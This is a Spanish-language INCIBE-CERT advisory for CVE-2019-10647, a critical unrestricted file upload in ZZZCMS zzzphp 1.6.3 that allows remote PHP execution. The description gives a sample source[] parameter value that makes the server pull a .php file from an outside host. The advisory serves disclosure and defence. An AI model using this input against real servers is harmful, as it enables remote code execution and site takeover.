Instituto Nacional de ciberseguridad. Sección Incibe
Instituto Nacional de Ciberseguridad. Sección INCIBE-CERT

Vulnerabilidad en ZZZCMS zzzphp (CVE-2019-10647)

Gravedad CVSS v3.1:
CRÍTICA
Tipo:
CWE-434 Subida sin restricciones de ficheros de tipos peligrosos
Fecha de publicación:
30/03/2019
Última modificación:
01/04/2019

Descripción

ZZZCMS zzzphp, en su versión v1.6.3, permite a los atacantes remotos ejecutar código PHP arbitrario mediante una URL .php en el parámetro source[] en plugins/ueditor/php/controller.php?action=catchimage debido a la falta de restricciones en inc/zzz_file.php. Por ejemplo, source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php podría emplearse si el servidor web 192.168.0.1 enviase el contenido de un archivo .php (p.ej., no interpreta un archivo .php).

Productos y versiones vulnerables

CPE Desde Hasta
cpe:2.3:a:zzzcms:zzzphp:1.6.3:*:*:*:*:*:*:*